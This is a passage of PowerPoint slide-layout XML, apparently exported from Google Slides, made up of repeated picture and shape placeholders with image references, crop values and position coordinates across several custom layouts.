          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="799" name="Google Shape;799;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="800" name="Google Shape;800;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="801" name="Google Shape;801;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="802" name="Google Shape;802;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520979" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="803" name="Google Shape;803;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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ay)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="804" name="Shape 804"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p42"/>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2"/>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7" name="Google Shape;807;p42"/>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08" name="Google Shape;808;p42"/>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09" name="Google Shape;809;p42"/>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10" name="Google Shape;810;p42"/>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11" name="Google Shape;811;p42"/>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2" name="Google Shape;812;p42"/>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3" name="Google Shape;813;p42"/>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2"/>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5" name="Google Shape;815;p42"/>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2"/>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7" name="Google Shape;817;p42"/>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2"/>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19" name="Google Shape;819;p42"/>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2"/>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1" name="Google Shape;821;p42"/>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2"/>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23" name="Google Shape;823;p42"/>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2"/>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25" name="Google Shape;825;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="826" name="Google Shape;826;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="827" name="Google Shape;827;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="828" name="Google Shape;828;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="829" name="Google Shape;829;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="830" name="Google Shape;830;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2892" l="0" r="0" t="2883"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="831" name="Google Shape;831;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2892" l="0" r="0" t="2883"/>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Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="832" name="Shape 832"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Google Shape;833;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045025" y="11616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3"/>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35" name="Google Shape;835;p43"/>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36" name="Google Shape;836;p43"/>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37" name="Google Shape;837;p4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38" name="Google Shape;838;p43"/>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39" name="Google Shape;839;p43"/>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0" name="Google Shape;840;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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1" name="Google Shape;841;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045200" y="16842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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250" y="1697950"/>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3" name="Google Shape;843;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045075" y="220740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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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5" name="Google Shape;845;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045075" y="27300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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-250" y="27437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7" name="Google Shape;847;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="3252650"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3266350"/>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9" name="Google Shape;849;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="377527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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="3788975"/>
            <a:ext cx="9144000" cy="4572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51" name="Google Shape;851;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="4323425"/>
            <a:ext cx="7849500" cy="4464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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4337125"/>
            <a:ext cx="9144000" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="13258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53" name="Google Shape;853;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="854" name="Google Shape;854;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="855" name="Google Shape;855;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="856" name="Google Shape;856;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="857" name="Google Shape;857;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="858" name="Google Shape;858;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1616" l="0" r="0" t="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="859" name="Google Shape;859;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1616" l="0" r="0" t="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980" cy="393192"/>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8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="860" name="Shape 860"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;p44"/>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2" name="Google Shape;862;p44"/>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63" name="Google Shape;863;p44"/>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64" name="Google Shape;864;p44"/>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65" name="Google Shape;865;p44"/>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66" name="Google Shape;866;p44"/>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7" name="Google Shape;867;p44"/>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44"/>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69" name="Google Shape;869;p44"/>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1" name="Google Shape;871;p44"/>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3" name="Google Shape;873;p44"/>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44"/>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5" name="Google Shape;875;p44"/>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7" name="Google Shape;877;p44"/>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9" name="Google Shape;879;p44"/>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81" name="Google Shape;881;p44"/>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883" name="Google Shape;883;p44"/>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884" name="Google Shape;884;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="885" name="Google Shape;885;p44"/>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886" name="Google Shape;886;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="887" name="Google Shape;887;p44"/>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888" name="Google Shape;888;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="889" name="Google Shape;889;p44"/>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890" name="Google Shape;890;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047"/>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8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="891" name="Shape 891"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p45"/>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3" name="Google Shape;893;p45"/>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894" name="Google Shape;894;p45"/>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895" name="Google Shape;895;p45"/>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896" name="Google Shape;896;p45"/>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897" name="Google Shape;897;p45"/>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98" name="Google Shape;898;p45"/>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0" name="Google Shape;900;p45"/>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2" name="Google Shape;902;p45"/>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4" name="Google Shape;904;p45"/>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6" name="Google Shape;906;p45"/>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08" name="Google Shape;908;p45"/>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0" name="Google Shape;910;p45"/>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12" name="Google Shape;912;p45"/>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14" name="Google Shape;914;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="915" name="Google Shape;915;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="916" name="Google Shape;916;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="917" name="Google Shape;917;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="918" name="Google Shape;918;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="919" name="Google Shape;919;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="920" name="Google Shape;920;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="921" name="Google Shape;921;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>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ay)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="922" name="Shape 922"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;p46"/>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4" name="Google Shape;924;p46"/>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25" name="Google Shape;925;p46"/>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26" name="Google Shape;926;p46"/>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27" name="Google Shape;927;p46"/>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28" name="Google Shape;928;p46"/>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9" name="Google Shape;929;p46"/>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1" name="Google Shape;931;p46"/>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6"/>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3" name="Google Shape;933;p46"/>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6"/>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5" name="Google Shape;935;p46"/>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6"/>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7" name="Google Shape;937;p46"/>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6"/>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39" name="Google Shape;939;p46"/>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6"/>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1" name="Google Shape;941;p46"/>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6"/>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43" name="Google Shape;943;p46"/>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6"/>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45" name="Google Shape;945;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
